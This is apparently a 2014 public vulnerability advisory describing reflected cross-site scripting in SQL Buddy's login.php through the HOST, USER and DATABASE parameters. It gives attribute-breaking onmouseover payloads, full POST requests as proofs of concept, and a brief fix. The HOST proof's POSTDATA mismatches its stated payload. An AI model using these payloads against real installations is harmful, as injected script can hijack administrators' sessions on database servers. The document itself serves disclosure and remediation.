##################################################################################################
#
#Exploit Title : Sqlbuddy 1.3.2 & 1.3.3 Reflected Cross-Site Scripting
#Author : Govind Singh aka NullPort
#Vendor : http://sqlbuddy.com/
#Download Link : https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip (Sqlbuddy 1.3.3)
#Date : 14/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to : All IHT Members
#
###################################################################################################

About vendor :

SQL Buddy is an open source web based application written in PHP intended to handle the administration of MySQL and SQLite with the use of a Web browser. The project places an emphasis on ease of installation and a simple user interface.

Reflected Cross-Site Scripting vulnerability in the "login.php" page via the "DATABASE", "HOST" and "USER" parameters. Each payload closes the quoted HTML attribute into which the submitted value is reflected and appends an event handler, which indicates the values are echoed back without HTML-attribute encoding; the fix is to encode them for the attribute context (e.g. PHP htmlspecialchars() with ENT_QUOTES) before output.

=========== ===========================

HOST Payload : localhost" onmouseover=prompt(955794) bad="

PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=101
POSTDATA=ADAPTER=mysql&HOST=01/01/1967%22%20onmouseover%3dprompt(906831)%20bad%3d%22&USER=root&PASS=&DATABASE=
-----------------------------------------------------------------------------------------------------------------

USER payload : root" onmouseover=prompt(959474) bad="

PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, 
deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=93
POSTDATA=ADAPTER=mysql&HOST=01%2F01%2F1967&USER=root" onmouseover=prompt(959474) bad="&PASS=&DATABASE=
----------------------------------------------------------------------------------------------------------------------

DATABASE payload : 01/01/1967" onmouseover=prompt(906831) bad="

PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=98
POSTDATA=ADAPTER=mysql&HOST=localhost&USER=root&PASS=&DATABASE=01/01/1967" onmouseover=prompt(906831) bad="
------------------------------------------------------------------------------------------------------------------